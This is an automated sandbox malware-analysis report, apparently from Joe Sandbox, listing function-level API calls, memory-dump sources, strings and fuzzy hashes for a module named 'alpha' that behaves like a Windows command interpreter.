                                        • Part of subcall function 00007FF755CA6B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF755CA6AE8,?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925), ref: 00007FF755CA6B97
                                        • Part of subcall function 00007FF755CA6B84: RtlFreeHeap.NTDLL ref: 00007FF755CA6BAF
                                        • Part of subcall function 00007FF755CA6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA6AF1,?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925), ref: 00007FF755CA6B39
                                        • Part of subcall function 00007FF755CA6B30: RtlFreeHeap.NTDLL ref: 00007FF755CA6B4D
                                        • Part of subcall function 00007FF755CA6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA6AF1,?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925), ref: 00007FF755CA6B59
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925,?,?,?,?,00007FF755CAB9B1), ref: 00007FF755CA6B03
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CA6B17
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                      • String ID:
                                      • API String ID: 3512109576-0
                                      • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                      • Instruction ID: e2e29dddf79685a0669c8b00c34458f5275703eb73b4fc790ccc3de5ac654ea5
                                      • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                      • Instruction Fuzzy Hash: 94217FABE09A8385EB44AB65D4143B8BBA0EF59F49F9C8035C90E47391DF2CA4859370
                                      Function 00007FF755CAB6B0 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAAF82), ref: 00007FF755CAB6D0
                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAAF82), ref: 00007FF755CAB6E7
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAAF82), ref: 00007FF755CAB701
                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAAF82), ref: 00007FF755CAB715
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$Process$AllocSize
                                      • String ID:
                                      • API String ID: 2549470565-0
                                      • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                      • Instruction ID: bb4999945fa7fc23a0d9fae186252f2c1128828b886c1d5c04d2522f79115e69
                                      • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                      • Instruction Fuzzy Hash: E42133BBA09A8386EA55AB11E550078FAB1FF49F8CBCC9931DA4E43750DF7CE4418320
                                      Function 00007FF755CCCFF0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF755CB507A), ref: 00007FF755CCD01C
                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF755CB507A), ref: 00007FF755CCD033
                                      • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF755CB507A), ref: 00007FF755CCD06D
                                      • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF755CB507A), ref: 00007FF755CCD07F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                      • String ID:
                                      • API String ID: 1033415088-0
                                      • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                      • Instruction ID: 1c1a0d0269ff825f1e553904cfd46d481d6dde52df8df8d22bd7ac413a0ff26b
                                      • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                      • Instruction Fuzzy Hash: A0119076618A8286DB449B24F40417AF7E0FB8AF99F885135EA9E47B54DF3CD045CB10
                                      Function 00007FF755CA59E4 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CB1EA0: wcschr.MSVCRT(?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF755CD0D54), ref: 00007FF755CB1EB3
                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CA5A2E
                                      • _open_osfhandle.MSVCRT ref: 00007FF755CA5A4F
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF755CA260D), ref: 00007FF755CC37AA
                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF755CC37D2
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                      • String ID:
                                      • API String ID: 22757656-0
                                      • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                      • Instruction ID: 8dc6a51781427a159006b3de67ba451e841b3a3422554c9bfa056b53eb01da65
                                      • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                      • Instruction Fuzzy Hash: 9111B6B6A1464687E7505B14E44837CBAA0F789F68FA84734D62D473D0CF3CD4458B10
                                      Function 00007FF755CC5690 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF755CC5433,?,?,?,00007FF755CC69B8,?,?,?,?,?,00007FF755CB8C39), ref: 00007FF755CC56C5
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CC56D9
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF755CC5433,?,?,?,00007FF755CC69B8,?,?,?,?,?,00007FF755CB8C39), ref: 00007FF755CC56FD
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CC5711
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                      • Instruction ID: be8f98a15f077e1babb13bb4fad0e8b64dd81286d9a8971edbef54ebac3dba06
                                      • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                      • Instruction Fuzzy Hash: A6113AB6A04B81C6DB409F56E5040ADBBB0F74DF84B8D8125DB4E03718DF38E496C750
                                      Function 00007FF755CB9158 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                      • String ID:
                                      • API String ID: 140117192-0
                                      • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                      • Instruction ID: be3fa46a25d392e548c2c8b83b38f0250b43ef7279dcaf1ca374046deb23fb9d
                                      • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                      • Instruction Fuzzy Hash: 8C21BABA918B8286E780AB04F880369B774FB85F58FD80035DA8D83764DF7DE444C720
                                      Function 00007FF755CB4AD0 Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA8798), ref: 00007FF755CB4AD6
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA8798), ref: 00007FF755CB4AEF
                                        • Part of subcall function 00007FF755CB4A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A28
                                        • Part of subcall function 00007FF755CB4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A66
                                        • Part of subcall function 00007FF755CB4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A7D
                                        • Part of subcall function 00007FF755CB4A14: memmove.MSVCRT(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A9A
                                        • Part of subcall function 00007FF755CB4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4AA2
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA8798), ref: 00007FF755CBEE64
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CBEE78
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                      • String ID:
                                      • API String ID: 2759988882-0
                                      • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                      • Instruction ID: 4d959d48388af663785f28c653a4d9a026692cd9bc59ce1b42d60600849a91e8
                                      • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                      • Instruction Fuzzy Hash: 6FF044AAA19F83C6EB8467659404178E9E1FF4EF55FCD8434CD0E86340EE3CA8448330
                                      Function 00007FF755CCF22C Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ConsoleMode_get_osfhandle
                                      • String ID:
                                      • API String ID: 1606018815-0
                                      • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                      • Instruction ID: a813bace02fdf04323dc030edafde04bd5fb603b6d02a8f93aa07aea353fdb0d
                                      • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                      • Instruction Fuzzy Hash: 9EF01C7AA24A82CBD7446B10E844179FA60FFCAF06F88A234DA0B42394DF3CD0088B10
                                      Function 00007FF755CD10D8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CACD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDA6
                                        • Part of subcall function 00007FF755CACD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDBD
                                      • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF755CC827A), ref: 00007FF755CD11DC
                                      • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF755CC827A), ref: 00007FF755CD1277
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcessmemmovewcschr
                                      • String ID: &()[]{}^=;!%'+,`~
                                      • API String ID: 1135967885-381716982
                                      • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                      • Instruction ID: 1ea04695251b6bbb9b241214eda31d38c98e104f27f232e12780d1c87369bf5a
                                      • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                      • Instruction Fuzzy Hash: 167188FBA0828385E7A0AF15A440679F7E4FB94B9CF985239D94DC3B94DF3DA4418B10
                                      Function 00007FF755CAE420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CB06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB06D6
                                        • Part of subcall function 00007FF755CB06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB06F0
                                        • Part of subcall function 00007FF755CB06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB074D
                                        • Part of subcall function 00007FF755CB06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB0762
                                        • Part of subcall function 00007FF755CAEF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF755CAE626,?,?,00000000,00007FF755CB1F69), ref: 00007FF755CAF000
                                        • Part of subcall function 00007FF755CAEF40: wcschr.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF031
                                        • Part of subcall function 00007FF755CAEF40: iswdigit.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF0D6
                                      • longjmp.MSVCRT ref: 00007FF755CBCCBC
                                      • longjmp.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CBCCE0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                      • String ID: GeToken: (%x) '%s'
                                      • API String ID: 3282654869-1994581435
                                      • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                      • Instruction ID: b8c6d38c6475d302deac1178bc58519b6e8af537aa6826700fb277edb0616fac
                                      • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                      • Instruction Fuzzy Hash: B661C3EBA0924382FA55BB21E4541B9AB90EF46FACFDC4935C91D076D1EE3CE8408760
                                      Function 00007FF755CD08EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memmovewcsncmp
                                      • String ID: 0123456789
                                      • API String ID: 3879766669-2793719750
                                      • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                      • Instruction ID: 37d5057382ddbcf5cac368620705d71710891943dfa613ca6b4fbb0aaca38751
                                      • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                      • Instruction Fuzzy Hash: 0E41E8A7F197C781EAA5AF2994002BAA354FB44FD8FC85131CE4D97784EE3CE4418390
                                      Function 00007FF755CC9784 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CC97D0
                                        • Part of subcall function 00007FF755CAD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD46E
                                        • Part of subcall function 00007FF755CAD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD485
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD4EE
                                        • Part of subcall function 00007FF755CAD3F0: iswspace.MSVCRT ref: 00007FF755CAD54D
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD569
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD58C
                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CC98D7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                      • String ID: Software\Classes
                                      • API String ID: 2714550308-1656466771
                                      • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                      • Instruction ID: 3d1c62c0c9822b1624221441c176f295e3649fe40a81ef6e6e39d5bc84e66ef5
                                      • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                      • Instruction Fuzzy Hash: 0441906BA19B5381EA00EB16D444039A3A4FB85FD8F989131DA6E4B7E5DF39E842C350
                                      Function 00007FF755CCA0B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CCA0FC
                                        • Part of subcall function 00007FF755CAD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD46E
                                        • Part of subcall function 00007FF755CAD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD485
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD4EE
                                        • Part of subcall function 00007FF755CAD3F0: iswspace.MSVCRT ref: 00007FF755CAD54D
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD569
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD58C
                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CCA1FB
                                      Strings
